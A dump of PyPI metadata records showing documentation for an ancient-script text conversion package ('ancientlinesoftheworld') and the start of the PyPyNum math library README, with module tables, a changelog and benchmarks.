Presses a key using the DirectInput method (via the pydirectinput library).
#
---
`zhmiscellany.cpp`
---
`zhmiscellany.cpp.subtract_lists()`
---
`zhmiscellany.cpp.subtract_lists(l1, l2)`
Subtracts l2 from l1 and returns l1. Much faster than any list subtraction possible. | text/markdown | zh | imnotgivingmyemailjustaddmeondiscordmydiscordisz_h_@zh.com | null | null | null | null | [
"Programming Language :: Python :: 3",
"Operating System :: Microsoft :: Windows"
] | [] | https://discord.gg/ThBBAuueVJ | null | >=3.6 | [] | [] | [] | [
"pycryptodome>=0",
"discum==1.1.0",
"requests>=0",
"dill>=0",
"numpy>=0",
"keyboard>=0",
"psutil>=0",
"kthread>=0",
"pillow>=0",
"fuzzywuzzy>=0",
"orjson>=0",
"zstandard>=0",
"pyautogui>=0; sys_platform == \"linux\"",
"ray>=0; sys_platform == \"win32\"",
"pywin32>=0; sys_platform == \"win32\"",
"random-header-generator>=0; sys_platform == \"win32\"",
"pydirectinput>=0; sys_platform == \"win32\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/zen-ham/zhmiscellany/issues"
] | twine/6.1.0 CPython/3.11.9 | 2026-02-20T09:37:08.535440 | zhmiscellany-6.5.6-py3-none-any.whl | 173,178 | 51/77/92dbabdbb7054d4f0584778c08f03312a7ccbd66f20c2c3ddfd42f2c2ce0/zhmiscellany-6.5.6-py3-none-any.whl | py3 | bdist_wheel | null | false | f89d4752db155f197cadcbd6560c7825 | 347e4315fb46177965ad305ca29018c1c014790680584521285e015f3a9cf370 | 517792dbabdbb7054d4f0584778c08f03312a7ccbd66f20c2c3ddfd42f2c2ce0 | null | [] | 108 |
2.4 | ancientlinesoftheworld | 4.2.2 | Convert Persian and English text to ancient scripts like Pahlavi, Avestan, Cuneiform, and Manichaean. | # Ancient Scripts Converter
[](https://pepy.tech/projects/ancientlinesoftheworld)
📜 A Python package for converting text to ancient writing systems
## How It Works / نحوه کارکرد
The converter works **character by character** using **mapping dictionaries**.
مبدل به صورت **حرف به حرف** و با استفاده از **دایرهالمعارفهای نگارشی** کار میکند.
# Text Conversion Flow
```
Input Text
│
▼
[Iterate Character by Character]
│
▼
[Check Character Type]
├─ Persian Letter → Persian Mapping Dictionary
├─ English Letter → English Mapping Dictionary
├─ Number → Number Mapping Dictionary
└─ Symbol → Symbol Mapping Dictionary
│
▼
[Convert or Keep Original]
│
▼
Output Text in Ancient Script
```
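The flow above amounts to one dictionary lookup per character. A minimal sketch (the mapping below is a toy dictionary for illustration, not the package's real tables):

```python
# Toy mapping for illustration only; the real package ships full
# per-script dictionaries covering Persian, English, digits, and symbols.
TOY_CUNEIFORM = {"a": "𒀀", "b": "𒁀", "1": "𒐕"}

def convert(text, mapping):
    # Character-by-character lookup; unmapped characters pass through.
    return "".join(mapping.get(ch, ch) for ch in text)

print(convert("ab1!", TOY_CUNEIFORM))  # 𒀀𒁀𒐕!
```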
### Explanation / توضیح مرحله به مرحله:
1. **Character Mapping / نگاشت حروف**
- Each ancient script has its own dictionary mapping **Persian, English, numbers, and symbols**.
هر خط باستانی دارای دیکشنری مخصوص خود است که **حروف فارسی، انگلیسی، اعداد و علائم** را به نمادهای مربوطه تبدیل میکند.
2. **Conversion / تبدیل**
- Iterate through each character of the input text.
- Replace it with the mapped symbol from the dictionary.
- If a character is not found, keep it unchanged.
- هر حرف متن ورودی بررسی میشود، جایگزین نماد متناظر میشود، و اگر در دیکشنری نبود، بدون تغییر باقی میماند.
3. **Supported Types / انواع پشتیبانی شده**
- Persian letters / حروف فارسی
- English letters / حروف انگلیسی
- Numbers / اعداد
- Some punctuation and symbols / برخی علائم نگارشی و سمبلها
4. **Optimized Scripts / خطوط بهینه شده**
- Some scripts like **Linear B** or **Oracle Bone** use optimized mappings for **faster and more accurate conversion**.
برخی خطوط مانند **خط ب یا اوراکل بون** دارای **دایرهالمعارف بهینه** برای تبدیل سریعتر و دقیقتر هستند.
## Installation
```bash
pip install --upgrade ancientlinesoftheworld
```
## Usage
```python
from ancient import AncientScripts
converter = AncientScripts()
# Convert text to the ancient cuneiform script
cuneiform_text = converter.cuneiform("سلام")
print(cuneiform_text)
# Convert text to Egyptian hieroglyphs
hieroglyph_text = converter.hieroglyph("خدا")
print(hieroglyph_text)
# Convert text to the historical Avestan script
avesta = converter.avestan("hiسلام")
print(avesta)
print(converter.get_supported_scripts())
brahmi = converter.brahmi("HI سلام")
print(brahmi)
```
## Project :
```python
from ancient import AncientScripts, AncientTimeline
# Create an instance of the main class
c = AncientScripts()
# Create a timeline using the Pahlavi script
t = AncientTimeline(script='pahlavi')
print("🕊️ Welcome to AncientLinesOfTheWorld 🏛️")
print("=" * 60)
print("🔹 Supported Ancient Scripts:")
for name, desc in c.get_supported_scripts().items():
print(f" - {name:<12} → {desc}")
print("=" * 60)
text = "hi"
print(f"\nOriginal text: {text}\n")
print("🪶 Converted Texts:")
print(f" 🔸 Pahlavi: {c.pahlavi(text)}")
print(f" 🔸 Akkadian: {c.akkadian(text)}")
print(f" 🔸 Avestan: {c.avestan(text)}")
print(f" 🔸 Manichaean: {c.manichaean(text)}")
print(f" 🔸 Linear B: {c.linear_b(text)}")
print(f" 🔸 Hebrew: {c.hebrew(text)}")
print(f" 🔸 Hieroglyph: {c.hieroglyph(text)}")
print(f" 🔸 Sanskrit: {c.sanskrit(text)}")
print(f" 🔸 Oracle Bone: {c.oracle_bone(text)}")
print(f" 🔸 Cuneiform: {c.cuneiform(text)}")
print(f" 🔸 Brahmi: {c.brahmi(text)}")
print("\n" + "=" * 60)
# 🕰️ Show the live time in the Pahlavi script
print("📜 Real-time Ancient Timeline (Pahlavi Script):")
t.show()
print("=" * 60)
print("💫 Powered by AncientLinesOfTheWorld | Created by AmirHossein Kader")
```
## Generate images
تولید تصاویر با خطوط باستانی | Generate Images with Ancient Scripts
این کلاس متن شما را به خط باستانی مورد نظر تبدیل کرده و روی یک تصویر پسزمینه قرار میدهد. خروجی نهایی یک تصویر زیبا با متن باستانی است که در پوشه پروژه شما ذخیره میشود
English:
This class converts your text into the desired ancient script and places it on a background image. The final output is a beautiful image with ancient text, saved in your project directory.
⚙️ Constructor Parameters

| Parameter | Type | Default | Description |
|---|---|---|---|
| `script` | `str` | `"cuneiform"` | Target ancient script |
| `log_level` | `int` | `logging.INFO` | Logging level for debugging |

Input parameters of this class:

- `text` (required): the text to convert into the ancient script
- `output_filename` (optional): custom name for the output file; generated automatically if omitted
- `rtl` (optional): if `True`, the text is written right-to-left
- `enhance_contrast` (optional): if `True`, the text color is adjusted to suit the background
- `text_color` (optional): custom RGB color, e.g. `(255, 0, 0)` for red
## Simplest usage
```python
from ancient import AncientImageGenerator
# Create an object of the class and choose the script
generator = AncientImageGenerator(script="cuneiform")
# The text you want converted
text = "تمدن از اینجا آغاز شد"
# Generate an image with the ancient text
output_image = generator.generate_image(text)
print(f"📜 Image generated and saved at:\n{output_image}")
```
## With a custom filename
```python
generator.generate_image(
"متن باستانی",
output_filename="my_ancient_text.png"
)
```
## With a gold color and automatic contrast
```python
generator.generate_image(
"شاهکار تاریخ",
    text_color=(255, 215, 0),  # gold
enhance_contrast=True
)
```
Clearing the caches that were used:
```python
generator.clear_font_cache()
```
رنگهای پرکاربرد | Common Colors:
text_color=(255, 0, 0) # 🔴 قرمز | Red
text_color=(0, 255, 0) # 🟢 سبز | Green
text_color=(0, 0, 255) # 🔵 آبی | Blue
text_color=(255, 255, 0) # 🟡 زرد | Yellow
text_color=(255, 0, 255) # 🟣 بنفش | Magenta
text_color=(0, 255, 255) # 🔷 فیروزهای | Cyan
text_color=(0, 0, 0) # ⚫ مشکی | Black
text_color=(255, 255, 255) # ⚪ سفید | White
text_color=(255, 215, 0) # 🏆 طلایی | Gold
text_color=(192, 192, 192) # ⚪ نقرهای | Silver
text_color=(128, 0, 128) # 🟣 ارغوانی | Purple
text_color=(255, 165, 0) # 🟠 نارنجی | Orange
# AncientTimeline
The `AncientTimeline` class is designed to **display the current time in ancient scripts** (cuneiform, Pahlavi, Manichaean, hieroglyph, Akkadian, Oracle Bone, and Avestan).
### ⚙️ Parameters
| Parameter | Type | Description |
|---------|-----|-------|
| `script` | `str` | Ancient script to render (`'cuneiform'`, `'pahlavi'`, `'manichaean'`, `'hieroglyph'`, `'akkadian'`, `'oracle_bone'`, `'avestan'`) |
| `ancient_format` | `bool` | If `True`, the date is rendered in an ancient style |
### 🖥️ Usage example
```python
from ancient import AncientTimeline
timeline = AncientTimeline(script='pahlavi', ancient_format=True)
print(timeline.as_text())  # get the current time as text
timeline.show()  # print the time to the console
```
## 🔑 Prerequisite
To use this class you need to:
1. Register at Liara and obtain an **API Key**:
   [https://console.liara.ir/ai](https://console.liara.ir/ai)
## AncientScriptAI:
| Parameter | Type | Description |
| --------------------- | ------ | ------------------------------------------------------------------- |
| `user_input` | `str` | The user's input text to be answered in the ancient language |
| `script` | `str` | Target ancient script (one of `SUPPORTED_SCRIPTS`) |
| `include_translation` | `bool` | If `True`, the output also includes a **Persian and English translation** |
```python
from ancient import AncientScriptAI
# Provide your API token
api_key = ""
ai_bot = AncientScriptAI(api_key=api_key, base_url="https://ai.liara.ir/api/v1/<>")
# The user's input text
text = "سلام باستانی"
script = "cuneiform"
# Get the AI response
response = ai_bot.get_ancient_response(text, script)
print(response)
```
## AncientAnimator
AncientAnimator converts input text into ancient scripts and displays the result as an
animated, character-by-character output.
It simulates real-time writing by rendering each character with a configurable delay.
The animation can be shown directly in the terminal or streamed through a callback function,
making it suitable for CLI tools, GUI applications, and web-based environments.
---
AncientAnimator متن ورودی را به خطهای باستانی تبدیل کرده و خروجی را بهصورت انیمیشنی،
کاراکتر به کاراکتر نمایش میدهد.
این کلاس فرآیند «نوشتن تدریجی» را شبیهسازی میکند و میتواند خروجی را مستقیماً در ترمینال
نمایش دهد یا از طریق یک تابع callback در GUI یا وب استفاده شود.
---
## Parameters | پارامترها
- **text**
- English: Input text to be converted
- فارسی: متن ورودی برای تبدیل
- **script**
- English: Target ancient script
- فارسی: خط باستانی مقصد
- **delay**
- English: Delay between each character (in seconds)
- فارسی: تأخیر بین هر کاراکتر (بر حسب ثانیه)
- **output_func**
- English: Optional callback function for receiving animated output step-by-step
- فارسی: تابع callback اختیاری برای دریافت خروجی انیمیشنی بهصورت مرحلهای
---
## Example – Terminal | مثال – ترمینال
```python
from ancient import AncientAnimator
animator = AncientAnimator(delay=0.1)
animator.run(
text="Hello World",
script="pahlavi"
)
```
## Example – Callback | مثال – با Callback
```python
from ancient import AncientAnimator
def output_callback(chunk: str):
print(chunk)
animator = AncientAnimator(delay=0.05)
animator.run(
text="HI",
script="cuneiform",
output_func=output_callback
)
```
## Supported Scripts
- Cuneiform
- Egyptian Hieroglyphs
- Pahlavi script
- Manichaean script
- Linear B
- Avestan
- Brahmi
- And more...
# 🌐 WebApp — the `AncientWeb` class
The **`AncientWeb`** class is one of the unique features of the `ancientlinesoftheworld` library.
It provides a **local web application** that lets you convert text into **ancient scripts**, with no external host or server required.
---
## 🎯 What the class does
- Automatically runs a **Flask web app** on your machine
- Presents a simple, user-friendly interface
- Supports **all ancient scripts available in the library**
- Can be used offline and locally
- Suitable for testing, demos, or personal and educational use
---
## 🚀 Usage example
```python
from ancient import AncientWeb
# Create an instance of the class
app = AncientWeb(version="2.5.0")
# Run the local web app
app.run_app()
```
## Library classes and their capabilities:
AncientScripts – converts text into various ancient scripts
AncientTimeline – displays the current time in ancient formats (cuneiform, Pahlavi, Avestan, …)
AncientImageGenerator – generates images featuring ancient scripts and historical designs
AncientScriptAI – intelligent processing and content generation with ancient scripts
AncientWeb – web tools for displaying ancient scripts
AncientAnimator – displays ancient scripts as animation
AncientReverseAI – converts ancient text back into Persian and English letters
## 🔁 AncientReverseAI
### AI-Powered Ancient Script → Persian & English Translator
### مبدل هوشمند خطوط باستانی به فارسی و انگلیسی
`AncientReverseAI` is an advanced and **unique AI-based module** designed to translate
**ancient scripts into meaningful Persian and English text**.
`AncientReverseAI` یک ماژول پیشرفته و منحصربهفرد است که با استفاده از **هوش مصنوعی معنایی**،
متون باستانی را به **فارسی و انگلیسی قابل فهم** تبدیل میکند.
## ✨ Key Features | ویژگیها
- 🧠 AI-based semantic translation
ترجمه هوشمند و مفهومی با هوش مصنوعی
- 📜 Supports multiple ancient writing systems
پشتیبانی از خطوط باستانی متنوع
- 🌍 Dual output: Persian & English
خروجی همزمان فارسی و انگلیسی
- 🧩 Context-aware translation (not literal)
درک جمله و معنا، نه ترجمه سطحی
- 🔌 Requires Internet & API Key
نیازمند اینترنت و کلید API
## ⚠️ Important Notes | نکات مهم
This is conceptual & historical translation, not glyph decoding
این ترجمه مفهومی است، نه صرفاً بازگردانی کاراکتر
Multiple interpretations may exist for ancient texts
ممکن است یک متن باستانی چند تفسیر معتبر داشته باشد
Best results with complete sentences
بهترین نتیجه با متون کامل و پیوسته حاصل میشود
## 🗂️ Supported Scripts | خطوط پشتیبانیشده
- Cuneiform — خط میخی
- Pahlavi — پهلوی
- Manichaean — مانی
- Hieroglyph — هیروگلیف مصری
- Akkadian — اکدی
- Oracle Bone — استخوان پیشگویی
- Avestan — اوستایی
- Linear B (optional)
## 🚀 Usage Example | نمونه استفاده
```python
from ancient import AncientReverseAI
ai = AncientReverseAI(api_key="YOUR_API_KEY",base_url= "https://ai.liara.ir/api/v1/")
ancient_text = "𒀀𒁀𒂊"
result = ai.translate(
text=ancient_text,
script="cuneiform"
)
print(result)
```
## Scientific note about this project:
**1. The Civilica scientific portal**
[https://civilica.com/note/17282/](https://civilica.com/note/17282/)
```bash
pip install --upgrade ancientlinesoftheworld
```
| text/markdown | Amir Hossein Khazaei | amirhossinpython03@gmail.com | null | null | MIT | null | [] | [] | https://github.com/amirhossinpython/ancientlinesoftheworld- | null | >=3.8 | [] | [] | [] | [
"deep-translator",
"Pillow",
"openai",
"feedparser",
"Flask"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.11.9 | 2026-02-20T09:36:39.162781 | ancientlinesoftheworld-4.2.2.tar.gz | 4,076,981 | ca/60/428d3251a7433231926d156db54cebbdb0e20812f64b716d983c3010a5ee/ancientlinesoftheworld-4.2.2.tar.gz | source | sdist | null | false | 2ee89d933af9d41071982659cceb0467 | f3cf3e5e634c6942adec62eafde4ece44530509610f0e78713ec121bc5d7291e | ca60428d3251a7433231926d156db54cebbdb0e20812f64b716d983c3010a5ee | null | [] | 212 |
2.4 | PyPyNum | 1.18.0 | PyPyNum is a versatile Python math lib. It features modules for math, data analysis, arrays, crypto, physics, RNG, data proc, stats, eq solving, image proc, interp, matrix calc, and high-prec math. Designed for scientific computing, data science, and ML, it offers efficient, general-purpose tools. | # PyPyNum
PyPyNum is a versatile Python math lib. It features modules for math, data analysis, arrays, crypto, physics, RNG, data
proc, stats, eq solving, image proc, interp, matrix calc, and high-prec math. Designed for scientific computing, data
science, and ML, it offers efficient, general-purpose tools.
```
________ ___ ___ ________ ___ ___ ________ ___ ___ _____ ______
|\ __ \ |\ \ / /||\ __ \ |\ \ / /||\ ___ \ |\ \|\ \ |\ _ \ _ \
\ \ \|\ \\ \ \/ / /\ \ \|\ \\ \ \/ / /\ \ \\ \ \\ \ \\\ \\ \ \\\__\ \ \
\ \ ____\\ \ / / \ \ ____\\ \ / / \ \ \\ \ \\ \ \\\ \\ \ \\|__| \ \
\ \ \___| \/ / / \ \ \___| \/ / / \ \ \\ \ \\ \ \\\ \\ \ \ \ \ \
\ \__\ __/ / / \ \__\ __/ / / \ \__\\ \__\\ \_______\\ \__\ \ \__\
\|__| |\___/ / \|__| |\___/ / \|__| \|__| \|_______| \|__| \|__|
\|___|/ \|___|/
```
[](https://pepy.tech/project/pypynum)
[](https://pepy.tech/project/pypynum)
[](https://pepy.tech/project/pypynum)
## PyPyNum | Version -> 1.18.0 | PyPI -> https://pypi.org/project/PyPyNum/ | Gitee -> https://www.gitee.com/PythonSJL/PyPyNum | GitHub -> https://github.com/PythonSJL/PyPyNum

The logo cannot be displayed on PyPI; it can be viewed on Gitee or GitHub.
### Introduction
+ A multi-functional math library, similar to numpy, scipy, etc., designed specifically for the PyPy interpreter while also supporting other Python interpreters
+ Update versions periodically to add more practical features
+ To get in touch, add QQ number 2261748025 (一只水晶兰) or email 2261748025@qq.com
```
+++++++++++++++++++++++++++++++++++++++++
+ Tip: +
+ Have suggestions or feature requests? +
+ Feel free to share them with us. +
+ Your feedback is highly appreciated! +
+++++++++++++++++++++++++++++++++++++++++
```
### Copyright and License
This Python library is licensed under the GNU Affero General Public License version 3 (AGPLv3).
The license is designed to ensure that network server software is made available to the community, allowing users to
access the source code of modified versions when the software is used to provide network services.
**Key Terms and Conditions:**
- Source Code: The library must be provided with its source code, and any modifications must also be distributed under
the AGPLv3.
- Free Redistribution: The library can be distributed in source and binary forms without any restrictions.
- No Discrimination: The license does not restrict the use of the software by individuals or organizations, nor does it
discriminate against fields of use.
- No Discrimination Against Persons or Groups: The license does not restrict anyone from receiving the software.
- Patent License: The patent holder must grant a patent license to anyone who uses the software.
- No Surrender of Others' Freedom: The license does not allow any conditions that contradict the AGPLv3.
- Remote Network Interaction: If the software can interact with users remotely, the source code must be made available
at no charge.
- Revised Versions of this License: The Free Software Foundation may publish revised versions of the AGPLv3, and users
have the option to follow the terms of any version.
- Disclaimer of Warranty: There is no warranty for the software, to the extent permitted by applicable law.
- Limitation of Liability: The copyright holder and any other party who modifies and conveys the software are not liable
for damages arising from the use or inability to use the software.
**Full License Text:**
[GNU Affero General Public License](https://www.gnu.org/licenses/agpl-3.0.en.html)
### Name and Function Introduction of Submodules
| Submodule Name | Function Introduction |
|:-------------------:|:------------------------------------------------------------------:|
| `pypynum.arrays` | Provides operations and calculations for multi-dimensional arrays. |
| `pypynum.chars` | Contains a variety of special mathematical characters. |
| `pypynum.ciphers` | Implements various encryption and decryption algorithms. |
| `pypynum.consts` | Contains mathematical and physical constants. |
| `pypynum.crandom` | Generates random complex numbers. |
| `pypynum.dataproc` | Tools for data preprocessing and transformation. |
| `pypynum.dists` | Statistical distribution functions and related calculations. |
| `pypynum.equations` | Solves equations and performs symbolic operations. |
| `pypynum.fft` | Implements Fast Fourier Transforms and related functionalities. |
| `pypynum.files` | File reading and writing tools. |
| `pypynum.geoms` | Geometric shapes and calculation methods. |
| `pypynum.graphs` | Graph theory algorithms and network analysis. |
| `pypynum.groups` | Group theory calculations and structural analysis. |
| `pypynum.hypcmpnms` | Hypercomplex number operations and transformations. |
| `pypynum.images` | Image processing and manipulation tools. |
| `pypynum.interp` | Interpolation methods and function approximation. |
| `pypynum.kernels` | Implementation of kernel functions and methods. |
| `pypynum.logics` | Simulates logical circuits. |
| `pypynum.maths` | Basic mathematical operations and commonly used functions. |
| `pypynum.matrices` | Matrix operations and linear algebra calculations. |
| `pypynum.multiprec` | High-precision numerical computations. |
| `pypynum.networks` | Network models and algorithms. |
| `pypynum.numbers` | Operations on numerical types and properties. |
| `pypynum.plotting` | Data visualization tools. |
| `pypynum.polys` | Polynomial operations and calculations. |
| `pypynum.pprinters` | Advanced printing and formatting output. |
| `pypynum.random` | Generates arrays of random numbers. |
| `pypynum.regs` | Regression analysis and model fitting. |
| `pypynum.seqs` | Computes various mathematical sequences. |
| `pypynum.special` | Provides advanced special functions for mathematical computations. |
| `pypynum.stattest` | Statistical tests and data analysis. |
| `pypynum.symbols` | Symbolic computation and expression manipulation. |
| `pypynum.tensors` | Tensor operations and calculations. |
| `pypynum.test` | Simple code testing for the library. |
| `pypynum.this` | The Zen of the library, expressing its guiding principles. |
| `pypynum.tools` | General tools and helper functions. |
| `pypynum.trees` | Tree structures and algorithm implementations. |
| `pypynum.types` | Contains various types, exceptions, and configurations. |
| `pypynum.ufuncs` | Universal functions and vectorized operations. |
| `pypynum.utils` | Utility programs and auxiliary functions. |
| `pypynum.vectors` | Vector operations and calculations. |
| `pypynum.zh_cn` | Provides Chinese language interfaces for various functionalities. |
### The Zen of PyPyNum (Preview)
```
The Zen of PyPyNum, by Shen Jiayi
In this mathematical sanctuary, we weave our algorithms with pure Python threads.
Precision outweighs approximation.
Elegance in mathematics transcends the bulky algorithms.
Clarity in logic illuminates the darkest problems.
Simplicity in form is the pinnacle of sophistication.
Flat hierarchies in our code mirror the linear nature of functions.
Sparse code, like a minimal polynomial, retains essence without redundancy.
```
```
...
Do you want to view all the content?
Enter "from pypynum import this" in your
Python interpreter and run it!
```
```
September 5, 2024
```
### Functional Changes Compared to the Previous Version
```
!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=
PyPyNum version 1.18.0 has undergone the following functional changes compared to version 1.17.2:
1. `arrays` Module
a. Fixed reflection operation errors in the `Array` class.
2. `ciphers` Module
a. The `base_64` function's input parameter and return type have been changed from `str` to `bytes`.
3. `groups` Module
a. The `Group` class has been refactored and new available methods have been added.
b. The `group` function now accepts an additional `operation` parameter.
4. `images` Module
a. Added a new class `JPEG` for JPEG image handling.
b. Added JPEG processing functions: `jpeg_adjust_qtable`, `jpeg_category`, `jpeg_channel_encoding`,
`jpeg_chroma_dc_huff`, `jpeg_dct8x8`, `jpeg_decode_pixels`, `jpeg_encode_pixels`, `jpeg_luma_dc_huff`,
`jpeg_rle_decoding`, `jpeg_rle_encoding`, `jpeg_split_pixels`, and `jpeg_zigzag`.
c. Added color space conversion functions `rgb2ycbcr` and `ycbcr2rgb` (which are JPEG-related functions).
d. Added `entropy` function (which is a PNG function).
e. Added PNG filter functions `png_apply_filter` and `png_reverse_filter`, allowing the `apply_filter` parameter
to be specified during writing to compress the generated file size.
5. `kernels` Module
a. Added `matmul8x8kernel` function for 8x8 matrix multiplication kernel operations.
6. `maths` Module
a. Added `dsigmoid` function.
b. Updated `sumprod` function with a new `floating` parameter.
7. `matrices` Module
a. Added `dctmtx` function to generate a discrete cosine transform matrix.
8. `numbers` Module
a. Added `round_sigfig` function.
b. Added `words2int` function to convert English words to integers.
9. `plotting` Module
a. Renamed the `color` function to `colortext`.
10. `seqs` Module
a. Updated `stirling1` function with a new `sign` parameter.
11. `special` Module
a. Added `ellipe` and `ellipk` functions for complete elliptic integrals.
12. `symbols` Module
a. Added `Expr` class.
b. Added `build_expr_tree`, `infix2postfix`, and `tokenize` functions.
c. The `parse_expr` function now returns an `Expr` object (previously returned a `list`).
13. `ufuncs` Module
a. Renamed comparison functions to follow more explicit naming conventions:
i. `eq` renamed to `equal`
ii. `ge` renamed to `greater_equal`
iii. `gt` renamed to `greater_than`
iv. `le` renamed to `less_equal`
v. `lt` renamed to `less_than`
vi. `ne` renamed to `not_equal`
!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=
```
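As an illustration of the new `round_sigfig` helper in the `numbers` module, rounding a value to a number of significant figures can be sketched in pure Python. This is an approximation for illustration only; the library's actual signature and edge-case handling may differ.

```python
import math

def round_sigfig_sketch(x, sigfigs):
    # Round x to the given number of significant figures by shifting
    # the decimal place according to the magnitude of x.
    if x == 0:
        return 0
    exponent = math.floor(math.log10(abs(x)))
    return round(x, sigfigs - 1 - exponent)

print(round_sigfig_sketch(123456, 3))    # 123000
print(round_sigfig_sketch(0.0012345, 2)) # 0.0012
```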
### Run Time Test
Python interpreter version
+ CPython 3.8.10
+ PyPy 3.10.12
| Matrix Time Test | NumPy+CPython (seconds) | Ranking | PyPyNum+PyPy (seconds) | Ranking | Mpmath_+_PyPy_ (seconds) | Ranking | SymPy_+_PyPy_ (seconds) | Ranking |
|------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|
| Create a hundred order random number matrix | 0.000083 | 1 | 0.005374 | 2 | 0.075253 | 3 | 0.230530 | 4 |
| Create a thousand order random number matrix | 0.006740 | 1 | 0.035666 | 2 | 1.200950 | 3 | 4.370265 | 4 |
| Addition of matrices of order one hundred | 0.000029 | 1 | 0.002163 | 2 | 0.045641 | 4 | 0.035700 | 3 |
| Adding matrices of order one thousand | 0.002647 | 1 | 0.019111 | 2 | 1.746957 | 4 | 0.771542 | 3 |
| Determinant of a hundred order matrix | 0.087209 | 2 | 0.016331 | 1 | 4.354507 | 3 | 5.157206 | 4 |
| Determinant of a thousand order matrix | 0.616113 | 1 | 3.509747 | 2 | It takes a long time | 3 | It takes a long time | 4 |
| Finding the inverse of a hundred order matrix | 0.162770 | 2 | 0.015768 | 1 | 8.162948 | 3 | 21.437424 | 4 |
| Finding the inverse of a thousand order matrix | 0.598905 | 1 | 17.072552 | 2 | It takes a long time | 3 | It takes a long time | 4 |
| Array output effect | ```[[[[ -7 -67]```<br>```[-78 29]]```<br><br>```[[-86 -97]```<br>```[ 68 -3]]]```<br><br><br>```[[[ 11 42]```<br>```[ 24 -65]]```<br><br>```[[-60 72]```<br>```[ 73 2]]]]``` | / | ```[[[[ 37 83]```<br>```[ 40 2]]```<br><br>```[[ -5 -34]```<br>```[ -7 72]]]```<br><br><br>```[[[ 13 -64]```<br>```[ 6 90]]```<br><br>```[[ 68 57]```<br>```[ 78 11]]]]``` | / | ```[-80.0 -8.0 80.0 -88.0]```<br>```[-99.0 -43.0 87.0 81.0]```<br>```[ 20.0 -55.0 98.0 8.0]```<br>```[ 8.0 44.0 64.0 -35.0]```<br><br>(Only supports matrices) | / | ```⎡⎡16 -56⎤ ⎡ 8 -28⎤⎤```<br>```⎢⎢ ⎥ ⎢ ⎥⎥```<br>```⎢⎣-56 56 ⎦ ⎣-28 28 ⎦⎥```<br>```⎢ ⎥```<br>```⎢ ⎡-2 7 ⎤ ⎡-18 63 ⎤⎥```<br>```⎢ ⎢ ⎥ ⎢ ⎥⎥```<br>```⎣ ⎣7 -7⎦ ⎣63 -63⎦⎦``` | / |
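Timings like the ones in the table above can be reproduced with a simple `time.perf_counter` harness; the sketch below is only an illustration of the measurement approach, not the benchmark script actually used:

```python
import time
from typing import Callable


def time_once(func: Callable[[], object]) -> float:
    """Run func once and return the elapsed wall-clock time in seconds."""
    start = time.perf_counter()
    func()
    return time.perf_counter() - start


# Example: time a naive 100x100 matrix addition in pure Python.
n = 100
a = [[1] * n for _ in range(n)]
b = [[2] * n for _ in range(n)]
elapsed = time_once(
    lambda: [[a[i][j] + b[i][j] for j in range(n)] for i in range(n)]
)
```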
### Basic Structure
```
PyPyNum
├── arrays
│ ├── CLASS
│ │ ├── Array(object)/__init__(self: Any, data: Any, check: Any) -> Any
│ │ └── BoolArray(pypynum.arrays.Array)/__init__(self: Any, data: Any, check: Any) -> Any
│ └── FUNCTION
│ ├── array(data: Any) -> Any
│ ├── asarray(data: Any) -> Any
│ ├── aslist(data: Any) -> Any
│ ├── boolarray(data: Any) -> Any
│ ├── fill(shape: typing.Union[list, tuple], sequence: typing.Union[list, tuple, str], repeat: bool, pad: typing.Any, rtype: typing.Callable) -> typing.Any
│ ├── full(shape: typing.Union[list, tuple], fill_value: typing.Any, rtype: typing.Callable) -> typing.Any
│ ├── full_like(a: typing.Any, fill_value: typing.Any, rtype: typing.Callable) -> typing.Any
│ ├── get_shape(data: Any) -> Any
│ ├── is_valid_array(_array: Any, _shape: Any) -> Any
│ ├── ones(shape: typing.Union[list, tuple], rtype: typing.Callable) -> typing.Any
│ ├── ones_like(a: typing.Any, rtype: typing.Callable) -> typing.Any
│ ├── tensorproduct(tensors: pypynum.arrays.Array) -> pypynum.arrays.Array
│ ├── zeros(shape: typing.Union[list, tuple], rtype: typing.Callable) -> typing.Any
│ └── zeros_like(a: typing.Any, rtype: typing.Callable) -> typing.Any
├── chars
│ ├── CLASS
│ └── FUNCTION
│ ├── int2subscript(standard_str: str) -> str
│ ├── int2superscript(standard_str: str) -> str
│ ├── subscript2int(subscript_str: str) -> str
│ └── superscript2int(superscript_str: str) -> str
├── ciphers
│ ├── CLASS
│ └── FUNCTION
│ ├── atbash(text: str) -> str
│ ├── base_64(text: bytes, decrypt: bool) -> bytes
│ ├── caesar(text: str, shift: int, decrypt: bool) -> str
│ ├── hill256(text: bytes, key: list, decrypt: bool) -> bytes
│ ├── ksa(key: bytes) -> list
│ ├── morse(text: str, decrypt: bool) -> str
│ ├── playfair(text: str, key: str, decrypt: bool) -> str
│ ├── prga(s: list) -> Any
│ ├── rc4(text: bytes, key: bytes) -> bytes
│ ├── rot13(text: str) -> str
│ ├── substitution(text: str, sub_map: dict, decrypt: bool) -> str
│ └── vigenere(text: str, key: str, decrypt: bool) -> str
├── consts
│ ├── CLASS
│ └── FUNCTION
├── crandom
│ ├── CLASS
│ └── FUNCTION
│ ├── randint_polar(left: int, right: int, mod: typing.Union[int, float], angle: typing.Union[int, float]) -> complex
│ ├── randint_rect(left: int, right: int, real: typing.Union[int, float], imag: typing.Union[int, float]) -> complex
│ ├── random_polar(mod: typing.Union[int, float], angle: typing.Union[int, float]) -> complex
│ ├── random_rect(real: typing.Union[int, float], imag: typing.Union[int, float]) -> complex
│ ├── uniform_polar(left: typing.Union[int, float], right: typing.Union[int, float], mod: typing.Union[int, float], angle: typing.Union[int, float]) -> complex
│ └── uniform_rect(left: typing.Union[int, float], right: typing.Union[int, float], real: typing.Union[int, float], imag: typing.Union[int, float]) -> complex
├── dataproc
│ ├── CLASS
│ │ └── Series(object)/__init__(self: Any, data: typing.Any, index: typing.Any) -> None
│ └── FUNCTION
├── dists
│ ├── CLASS
│ └── FUNCTION
│ ├── beta_pdf(x: Any, a: Any, b: Any) -> Any
│ ├── binom_pmf(k: Any, n: Any, p: Any) -> Any
│ ├── cauchy_cdf(x: Any, x0: Any, gamma: Any) -> Any
